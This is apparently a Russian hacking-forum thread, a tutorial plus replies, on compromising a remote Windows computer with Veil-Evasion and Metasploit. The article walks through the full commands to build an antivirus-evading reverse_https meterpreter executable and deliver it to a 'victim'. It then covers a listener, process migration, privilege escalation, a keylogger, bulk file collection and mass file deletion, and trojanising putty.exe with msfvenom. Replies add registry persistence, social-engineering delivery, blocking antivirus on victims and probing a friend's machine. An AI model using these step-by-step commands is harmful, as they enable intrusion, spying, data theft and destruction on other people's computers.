Статья Взлом удаленного компьютера, Veil-Evasion, Metasploit

В этой статье, будет подробно описан взлом удаленного компьютера с использованием Kali Linux, Veil-Evasion, Metasploit.

UPDATE:
Поддержка Veil-Evasion закончилась, рекомендуется использовать фреймворк Veil.
https://codeby.net/threads/veil-framework.60978/


Ниже представлена схема, по которой будет осуществляться проникновение.

upload_2016-7-26_15-33-33.png


Необходимые ресурсы:
1. Kali Linux (Я использовал Kali GNU/Linux Rolling)

2. Статический белый IP (В моем случае Kali находится за NAT роутера с статическим адресом. Подключение к нашей машине извне будут идти на 443 порт. (В роутере он проброшен на локальный адрес Kali.) Использующие динамический адрес могут использовать DyDNS. (Не пробовал, но должно работать)
3. Veil-Evasion – фреймворк, с помощью которого мы попытаемся обойти антивирус, создадим файл с полезной нагрузкой в формате .exe.

Для начала необходимо установить Veil-Evasion. Чтобы программа создавала корректно работающие файлы, не рекомендую установку apt-get install Veil-Evasion. Фреймворк нужно клонировать c github.com.
Выполните в терминале следующее:
Код:
apt-get -y install git
git clone https://github.com/Veil-Framework/Veil-Evasion.git
cd Veil-Evasion/
cd setup
setup.sh -c
Следим за установкой, соглашаемся и все устанавливаем.

Запускаем файл Veil-Evasion.py из терминала или из папки /root/Veil-Evasion.

upload_2016-7-26_15-34-5.png


Далее вводим команду list – она покажет список доступных payload.

upload_2016-7-26_15-34-57.png


Нас интересует номер 32python/meterpreter/reverse_https

Вводим - use 32

upload_2016-7-26_15-35-15.png


Задаем опции будущему файлу, вводим последовательно следующие команды:

set LHOST 83.199.12.XXX (Ваш публичный IP)

set LPORT 443 (По умолчанию HTTPS URL использует 443 TCP-порт (для незащищённого HTTP — 80).

set USE_PYHERION Y (используем энкриптор)

generate (создаем .exe файл)

Вводим имя создаваемого файла.

Выбираем вторую строку, жмем 2.

upload_2016-7-26_15-35-36.png


Ждем успешной генерации файла.

upload_2016-7-26_15-35-57.png


Созданный файл любым путем доставляем на компьютер жертвы. Весит немного, стандартными антивирусами Win7, Win8.1, Win10 не определялся.

Выходим из Veil-Evasion.

Запускаем Metasploit.
#msfconsole

Далее
Код:
msf > use multi/handler
msf exploit (handler) > set payload windows/meterpreter/reverse_https
msf exploit (handler) > set LHOST (свой внутренний IP)
msf exploit (handler)  > set LPORT 443
msf exploit (handler) >exploit
Когда файл на компьютере жертвы будет запущен, вы увидите что открылась сессия meterpreter>.

upload_2016-7-26_15-37-23.png


Сразу советую мигрировать в другой процесс т.к. файл могут удалить, процесс завершится и т.д.

Делается это так, вводим:
ps – отобразится список активных процессов. Находим , например, explorer, смотрим его PID.

migrate (PID процесса).
Migration completed successfully.
Успех. Теперь необходимо повысить права в системе, команда:
getsystem (срабатывает не всегда.)
В целом поможет разобраться стандартная команда help.
Ниже пару моментов которые помогут быстрее освоиться в системе.

1. Кейлоггер
meterpreter > bgrun keylogrecorder

[*] Executed Meterpreter with Job ID 2
meterpreter > [*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/logs/scripts/keylogrecorder/192.168.ххх.ххх_20111024.4455.txt #адрес лога
[*] Recording

meterpreter > bgkill 2 #отключаем кейлогер
[*] Killing background job 2...

2. Скрипт File_collector – позволит создавать список файлов имеющихся в определенном каталоге компьютера жертвы, редактировать его, и скачивать интересующие файлы себе.
Пример:
meterpreter > run file_collector -h
Затем создаем список файлов в одном каталоге:

run file_collector -r -d e:\\ -f * -o /root/ file.txt


Редактируем наш выходной файл, т.к. не все файлы нужны.
cat /root/file.txt | grep -v \DDD | grep -v \GCC | grep -v \GDB | grep -v \MAKE > file.lst


Скачиваем файлы на свой компьютер.

run file_collector -i /root /file.lst -l /root/

Полагаю не нужно обьяснять, что делают скрипты upload и download)

3. Используя скрипты scrapper и winenum можно собрать информацию о системе, которая сохранится на вашем локальном компьютере.

4. Удаление файлов. Команды вводятся в шелле.
Получаем его слудующим образом:
meterpreter >shell

Удаление файлов exe:
del e:\*.* /f /s /q

удаление файлов doc:
del e:\*.doc /f /s /q


удаление файлов pdf:
del e:\*.pdf /f /s /q


5. Командой приведенной ниже можно добавить payload в любой файл (определяется некоторыми антивирусами) При запуске на компьютере жертвы, откроется сессия meterpreter.

msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.1.101 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o puttyX.exe

Краткое пояснение аргументов команды:
- a 86 - архитектура процессора.
--platform windows - тут понятно.
- x - указать пользовательский исполняемый файл для использования в качестве шаблона.
- k - сохранить поведение шаблона и ввести полезную нагрузку как новый поток.
- p - тип полезной нагрузки.
- e - тип енкодера.
- b - помечаем нулевой байт «плохим», то есть говорим, что его нужно избегать.
- f - формат выходного файла.

За пример взята putty находящаяся в директории /root.
LHOST и LPORT указываем свои.

Приведенный метод, хорошо справляется с взломом Win7, Win8, Win10, вопросы жду в комментариях. Если кто-то умеет криптовать файлы, интересно услышать его мнение.
 
Последнее редактирование:

thunder

Green Team
08.12.2016
219
26
BIT
0
Не совсем понял вопрос. NO-IP позволяет сделать статический IP адрес, но не эмулировать рабочие системы. Быть может Вы имели ввиду - что есть системы для пентеста с динамическим IP, и что бы каждый раз не актуализировать IP (к примеру для своей команды тестеров) Вы желаете иметь постояный?
Да (улыбнуло) я имел ввиду присвоить статический адрес двум виртуальным машинам (разные статические ip адреса),тем самым попытаться создать элюзию(эмуляцию) двух систем в глобальной сети (улыбнуло). Хотелось бы максимально (на сколько это возможно) приблизить пентестинг /атаку к реальным условиям .
 

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
приблизить пентестинг /атаку к реальным условиям .

А где тут реальные условия? IP адрес какой роли не играет, играет сама система на виртуалке, если приблизить к реальным условиям - надо и собирать систему похожую: веб-сервер, почтовик, фтп и т.д.

ПС Хотите больше реальности - можете договориться с небольшими компаниями и оказать им услуги тестирования, к примеру за 1000 рублей или вообще бесплатно. Но если речь о набивание руки - поднимайте виртуалку локально и работайте.
 
F

for(i=0;i<225;i++);

1) На стадии скачивания уже файл может быть заблокирован - нужен криптор и обход антивируса (тоже есть на форуме)
2) Если у тестируемого будет стоять боле менее вменяемый фаэрвол то батник не пройдет, надо что бы была миграция на другой процесс, доверенный
3) Все инструкции есть на форуме.
4) Скачал - законектило, Вы логику включите - у Вас 1 порт и 1 файл, если куча людей будет стучаться в порт, что произойдет?

В данном случае, Veil рассматривается как инструмент для тестирования 1 системы или несколько. Тоесть - исходя из них создается весь вектор атаки, способ реализации.
это Вы имеите в Виду создать exe. python/meterpreter/rev_https set USE_PYHERION Y И вопрос букву (Y) так и оставить??? и файл exe поместить на компьютер жертвы и запустить????так тогда как мне сделать???ответьте на все вопросы, И прошу довайте Ссылки!!!
 

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
это Вы имеите в Виду создать exe. python/meterpreter/rev_https set USE_PYHERION Y И вопрос букву (Y) так и оставить???!

1) Про это все написано в первом посте
2) Нет супер программы для создания ехе или бат за 1 минуту, которую скачает 1000000 человек, запустит, обойдет все АВ и фаэрволы и Вы получите контроль над их системами
3) Прошу формулировать вопросы более точнее т не дублировать
4) Как запустить на тестируемой машине - на Ваш выбор ( социальная инженери, МИТМ, через уязвимость в системе ) - никто не понесет за Вас этот файл и тем более не запустит. Если нет физ доступа к системе - социальная инженерия в помощь
 
Последнее редактирование:
  • Нравится
Реакции: Mixa и kot-gor
F

for(i=0;i<225;i++);

Не совсем понял вопрос. NO-IP позволяет сделать статический IP адрес, но не эмулировать рабочие системы. Быть может Вы имели ввиду - что есть системы для пентеста с динамическим IP, и что бы каждый раз не актуализировать IP (к примеру для своей команды тестеров) Вы желаете иметь постояный?
Вы жи сами пишете: 1) На стадии скачивания уже файл может быть заблокирован - нужен криптор и обход антивируса (тоже есть на форуме) я вам и написал один из вариантов-python/meterpreter/rev_https set USE_PYHERION Y криптор, или не так????
 

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
Вы жи сами пишете: 1) На стадии скачивания уже файл может быть заблокирован - нужен криптор и обход антивируса (тоже есть на форуме) я вам и написал один из вариантов-python/meterpreter/rev_https set USE_PYHERION Y криптор, или не так????

1) Вы вот попробуйте этот метод и у себя протестируйте
2) Как обойти АВ - статья нашем ресурсе https://codeby.net/blogs/kak-obojti-antivirus-ispolzuya-veil/
3) Пробуйте на своих системах - увидите результат, сидя и шадая Вы ничего несможете прощупать
4) В Паблике нет инструментов который помогут создать мега файл для хака всех и можете не искать, на черном рынке пакер и криптор, свежие малвари Вы купите от 1000 у/е - сутки у Вас будут, далее опять новый так как антивирусы не дремлют. Это ясно Вам? Если Вы ведете речь точнее подводите к этому
 
F

for(i=0;i<225;i++);

1) Вы вот попробуйте этот метод и у себя протестируйте
2) Как обойти АВ - статья нашем ресурсе ***Скрытый текст***
3) Пробуйте на своих системах - увидите результат, сидя и шадая Вы ничего несможете прощупать
4) В Паблике нет инструментов который помогут создать мега файл для хака всех и можете не искать, на черном рынке пакер и криптор, свежие малвари Вы купите от 1000 у/е - сутки у Вас будут, далее опять новый так как антивирусы не дремлют. Это ясно Вам? Если Вы ведете речь точнее подводите к этому
У меня в локалке всё работает, я протестировал много метобов в программе Veil-Evasion те которые мне понравелись под номеров 23 и 32 они работают в локалке дажи если на подопытном кролике включен АВ и антивирус(аваст) я решил идти дальши, и я пытаюсь Из вас вытинуть нужную информацию, но вы ходите вокруг да около!!Darknet Это весело:) там классные....
 

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
Из вас вытинуть нужную информацию, но вы ходите вокруг да около!!Darknet Это весело:) там классные....

Какую информацию? Вся проблема в том, что все ответы есть в этой теме, из Ваших постов вообще сложно понять, что желаете, я только понял что у Вас с другом не складывается тест и написал как поступить, Вы попробовали? Вас интересовал обход АВ - тему Вам дал. Если у Вас не получеватся и советы не помогли никто кроме Вас не сможет там решить вопрос, потому что не видно технической части, тот же провайдер может нести блок - Вы звонили и узнавали? Если этот друг в шаговой доступности - притащите блок домой к себе или ноут к нему и по локалке тест сделайте или ВПН я советовал - Вы это сделали?
 
F

for(i=0;i<225;i++);

Какую информацию? Вся проблема в том, что все ответы есть в этой теме, из Ваших постов вообще сложно понять, что желаете, я только понял что у Вас с другом не складывается тест и написал как поступить, Вы попробовали? Вас интересовал обход АВ - тему Вам дал. Если у Вас не получеватся и советы не помогли никто кроме Вас не сможет там решить вопрос, потому что не видно технической части, тот же провайдер может нести блок - Вы звонили и узнавали? Если этот друг в шаговой доступности - притащите блок домой к себе или ноут к нему и по локалке тест сделайте или ВПН я советовал - Вы это сделали?
Да, перед тем как отдовать своего второго кролика я туда загнал windows 7 sp1 и роутер с такими ж настройками!!! и все протестил, в локалке!!!
 

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
Да, перед тем как отдовать своего второго кролика я туда загнал windows 7 sp1 и роутер с такими ж настройками!!! и все протестил, в локалке!!!

И потом этот комп был отдан другу и настроен у него для работы в Интернете, однако работать после этого все перестало. Верно?
если верно - то переделываем файлд на другой порт и пробудем (не забываем у себя проброс сделать), связываемся с провайдером и спрашиваем - есть ли блок или нет по разным портам, но перед этим ВПН сделайте и по нему пробуйте - там будет все равно есть ограничение или нет, сработает - значит дело в провайдере, нет - значит смотрим дальше
[doublepost=1483968490,1483967247][/doublepost]ip адреса точные указываете не пуатете их, например, c TOR? Может Вы за ТОР сели и адрес ТОР вписываете в файл?
 
  • Нравится
Реакции: Mixa

thunder

Green Team
08.12.2016
219
26
BIT
0
Люди, подскажите новичку ( по metasploit). Ситуация следующая ..с генерированный файл в veil "hack1" поместил в папку system32(на атакуемой машине) ,прописав данный файл в реестр автозагрузки . При перезагрузке.. атакуемой машины.. получаю сессию (если изначально use multi/handler включен и ждет сессии ) .. если же выйти из полученной сессии ,и опять пытаться подключится .... ничего не выходит (процесс "hacker1" в диспетчере задач отсутствует) . Возможно ли сделать... постоянный доступ к данной машине (как при netcate) ?

[doublepost=1483988248,1483975130][/doublepost](Улыбнуло) Вопрос к знатокам Veil-Evasion и metasploit. С генерировал файл в Veil № 7 , закинул файл на винду (атакуемую машину).. открыл консоль в metasploit (handler) ввел
Код:
set payload windows/meterpreter/reverse_tcp
set LHOST свой ip
set LPORT 4444
exploit
Пытаюсь запустить генерированный файл винде .. не запускается (не появляется в процессе диспетчере задач), сессия не приходит.Что я делаю не так ?
 
Последнее редактирование модератором:
  • Нравится
Реакции: Mixa
M

Mixa

уххх инфы нахватался для дальнейшого обучения и роздумия. Всем спасибо и за пост, и за вопросы ))) и за ответы :)

ПС: продолжайте в том же духе!
 
D

Darwin_Douglas

Можешь сказать какое железо использовал?
 
M

Mixa

Подключайся к переписки:)
Я пока что наблюдатель )). Вопросов уйма конечно но и литературы, ресурсов нахватался мама не горюй. Буду "курить" литературу, бороздить просторы интернета и наблюдать за Вашей перепиской. Пока нечего добавить) но обязательно подключюсь... чуть скилл прокачаю ;-)
 
  • Нравится
Реакции: afalin

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
Можешь сказать какое железо использовал?

Если о железе как о системе - тут любой комп боле менее современный подойдет, карта Wi-Fi тут не играет ключеовой роли, роутер - так же можно почти любой домашний настроить. Или какое то еще железо?
 
F

for(i=0;i<225;i++);

Я пока что наблюдатель )). Вопросов уйма конечно но и литературы, ресурсов нахватался мама не горюй. Буду "курить" литературу, бороздить просторы интернета и наблюдать за Вашей перепиской. Пока нечего добавить) но обязательно подключюсь... чуть скилл прокачаю ;-)
Kali linux windows 7/8/10 ubuntu
[doublepost=1484055291,1484055136][/doublepost]
Если о железе как о системе - тут любой комп боле менее современный подойдет, карта Wi-Fi тут не играет ключеовой роли, роутер - так же можно почти любой домашний настроить. Или какое то еще железо?
нужен софт для того что бы когда я имел контроль над жертвоя я мог загнать туда зверинец(который бы блокировал установку антивируса через нет и флешку и так далее.Есть ли такой???
[doublepost=1484056021][/doublepost]
А где тут реальные условия? IP адрес какой роли не играет, играет сама система на виртуалке, если приблизить к реальным условиям - надо и собирать систему похожую: веб-сервер, почтовик, фтп и т.д.

ПС Хотите больше реальности - можете договориться с небольшими компаниями и оказать им услуги тестирования, к примеру за 1000 рублей или вообще бесплатно. Но если речь о набивание руки - поднимайте виртуалку локально и работайте.
Я сегодня проводил тест в локальной сети атакующий kali linux жертва Windows 10 for Enterprise (со стандартной защитой) я сумел запустить и bat и exe, после добавил Аваст security тест на проникновения прошел удачна!! после добавил к ним Kaspersky Internet Security он мой зверинец слопал:) Дай мне ищё методы в которых не нужно заганять зверинец на комп жертвы а Попробывать проникнуть самому!!!!Ссылки вперёд!!!
[doublepost=1484063343][/doublepost]
Если о железе как о системе - тут любой комп боле менее современный подойдет, карта Wi-Fi тут не играет ключеовой роли, роутер - так же можно почти любой домашний настроить. Или какое то еще железо?

подскажите мне метод атаки имея вот это:
Starting Nmap 7.40 ( ) at 2017-01-10 18:44 MSK
Nmap scan report for 192.168.1.106
Host is up (0.019s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE
5357/tcp open wsdapi

MAC Address: XX:B5:XX:XX:XX:XX (Liteon Technology)
windows 7 sp1
 
Последнее редактирование модератором:

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
нужен софт для того что бы когда я имел контроль над жертвоя я мог загнать туда зверинец(который бы блокировал установку антивируса через нет и флешку и так далее.Есть ли такой???

Если пользователь принесет на систему антивирус свежий, и у него не получиться его поставить (к примеру прописать в систему блокировку на запуск определенных файлов по названию) - это будет крайне подозрительно, то же с фаэрволом. Единственный вариант, когда вредоносу удается долго жить на системе (с учетом что администратор качает обновки баз АВ) - это самостоятельна поддержка, мощнай криптовка файла (уже писал - крипторы действенные и протекторы стоят хороших денег) бесплатного ничего нет из мощных аналогов, поэтому при помощи Veil и так дает много возможностей, надо ими верно пользоваться.

Я сегодня проводил тест в локальной сети атакующий kali linux жертва Windows 10 for Enterprise (со стандартной защитой) я сумел запустить и bat и exe, после добавил Аваст security тест на проникновения прошел удачна!! после добавил к ним Kaspersky Internet Security он мой зверинец слопал:) Дай мне ищё методы в которых не нужно заганять зверинец на комп жертвы а Попробывать проникнуть самому!!!!Ссылки вперёд!!!

Не "загоняя" на систему вредоносного файла, но получить доступ можно через remote exploit, так как начинается в наше время все с роутера перед компом, посмотрите тему Rext v1.0.0 - Router Exploitation Toolkit , касаемо системы, я не уверен в доступности в паблике свежих эксплоитов для получения доступа при стандартной картине (когда на домашней машине не лишних сервисов)

подскажите мне метод атаки имея вот это:
Starting Nmap 7.40 ( ) at 2017-01-10 18:44 MSK
Nmap scan report for 192.168.1.106
Host is up (0.019s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE
5357/tcp open wsdapi

MAC Address: XX:B5:XX:XX:XX:XX (Liteon Technology)

Ну вот Вы видите порт открытый на системе - посмотрите про данный сервис информацию, возможные уязвимости.

ПС Если по Veil у Вас нет вопросов - то продолжайе расширения кругозора в других темах или создайте новую.
 
F

for(i=0;i<225;i++);

Если пользователь принесет на систему антивирус свежий, и у него не получиться его поставить (к примеру прописать в систему блокировку на запуск определенных файлов по названию) - это будет крайне подозрительно, то же с фаэрволом. Единственный вариант, когда вредоносу удается долго жить на системе (с учетом что администратор качает обновки баз АВ) - это самостоятельна поддержка, мощнай криптовка файла (уже писал - крипторы действенные и протекторы стоят хороших денег) бесплатного ничего нет из мощных аналогов, поэтому при помощи Veil и так дает много возможностей, надо ими верно пользоваться.



Не "загоняя" на систему вредоносного файла, но получить доступ можно через remote exploit, так как начинается в наше время все с роутера перед компом, посмотрите тему Rext v1.0.0 - Router Exploitation Toolkit , касаемо системы, я не уверен в доступности в паблике свежих эксплоитов для получения доступа при стандартной картине (когда на домашней машине не лишних сервисов)



Ну вот Вы видите порт открытый на системе - посмотрите про данный сервис информацию, возможные уязвимости.

ПС Если по Veil у Вас нет вопросов - то продолжайе расширения кругозора в других темах или создайте новую.
Это виндовс 7 , моего друга, как проверить на уязвимость ???? или каким учплоидом атаковать???
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!